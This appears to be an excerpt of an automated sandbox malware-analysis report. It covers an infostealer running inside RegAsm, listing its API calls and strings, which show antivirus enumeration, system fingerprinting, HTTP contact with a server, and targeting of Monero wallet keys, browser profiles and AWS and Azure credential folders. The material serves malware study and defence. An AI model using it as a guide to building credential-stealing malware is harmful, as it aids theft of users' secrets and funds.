                                                                            • Opcode ID: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                            • Instruction ID: f7fb810ff7d1253c450dda7b52a61bb1d28e29dbb724758fa3153a55c7d62ffe
                                                                            • Opcode Fuzzy Hash: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                            • Instruction Fuzzy Hash: 24513EB1D0424DEEDB11EBE5C992ADEBBB8AF18304F50017EE105B3582DB785B48CB65
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041092A
                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                            • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                            • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                              • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000), ref: 00410C95
                                                                              • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                            • API String ID: 3694693100-315474579
                                                                            • Opcode ID: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                            • Instruction ID: 31939d6998afadb2a5dbf95c0d2b4f071c2bc660873cc242f14b71194dd59c4b
                                                                            • Opcode Fuzzy Hash: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                            • Instruction Fuzzy Hash: 5B418E70A01229BBCB20DB95DD49EEF7F78EF49B60F60411AF115A6180C7B85A41CBA8
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410076
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                            • wsprintfA.USER32 ref: 00410132
                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                            • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                            • String ID: - $%s\%s$?
                                                                            • API String ID: 404191982-3278919252
                                                                            • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                            • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                            • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                            • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040F68E
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                            • memset.MSVCRT ref: 0040F708
                                                                            • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                              • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                              • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                            Strings
                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                            • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                            • API String ID: 3050127167-1622206642
                                                                            • Opcode ID: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                            • Instruction ID: 5386366d5d033f49441d76ecd0ffc2bd1dc3d668faeba3ff857dabf4a36879bb
                                                                            • Opcode Fuzzy Hash: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                            • Instruction Fuzzy Hash: 7A517C71900219AEDB20EB94DC81AEEBBB9EF04314F20007EF114B66C1DB795E88CB59
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004104E2
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                            • wsprintfA.USER32 ref: 004105AD
                                                                            • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                              • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                              • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                              • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                            • String ID: :\$C
                                                                            • API String ID: 688099012-3309953409
                                                                            • Opcode ID: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                            • Instruction ID: 31ba2aefab9431e017bcb41f2bdcd0be11d417c1f72aa959c07d5e8bae5074a4
                                                                            • Opcode Fuzzy Hash: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                            • Instruction Fuzzy Hash: 8D418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA385A48CBB5
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041311D
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                              • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                              • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                              • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                              • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                              • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                              • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                            • API String ID: 3807055897-1526165396
                                                                            • Opcode ID: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                            • Instruction ID: 62ef994e2eebf51157d4abcec818fbc8b07954dcba3d20b807130a2a391ecf21
                                                                            • Opcode Fuzzy Hash: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                            • Instruction Fuzzy Hash: A341A4B1900258EACB11FFA5D956FDDB7B4AF18708F10017EF90173182DB786B48CA6A
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                              • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                            • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                            • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                            • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy
                                                                            • String ID: Stable\$ Stable\$firefox
                                                                            • API String ID: 2120869262-2697854757
                                                                            • Opcode ID: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                            • Instruction ID: 1f3c50db67794596869caf17774f63c9bcd5449133ce98ec0acc847700032956
                                                                            • Opcode Fuzzy Hash: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                            • Instruction Fuzzy Hash: 71E19271D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401C70
                                                                            • memset.MSVCRT ref: 00401C8E
                                                                              • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                              • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                              • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                              • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                            • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            • memset.MSVCRT ref: 00401E9D
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                            • API String ID: 1518627966-218353709
                                                                            • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                            • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                            • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                            • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00404DCF
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                            • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                            • String ID:
                                                                            • API String ID: 2737972104-0
                                                                            • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                            • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                            • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                            • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00416964
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                              • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,00426563,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                              • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                              • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                              • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                              • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                              • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                              • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                              • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                              • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                              • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                              • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                              • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                              • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                              • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                              • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                              • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                              • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                              • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                              • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                              • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                              • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                              • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                              • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426518,?,?,?,?,00416EC0), ref: 00411821
                                                                              • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                              • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                              • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                              • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                              • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                              • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmp
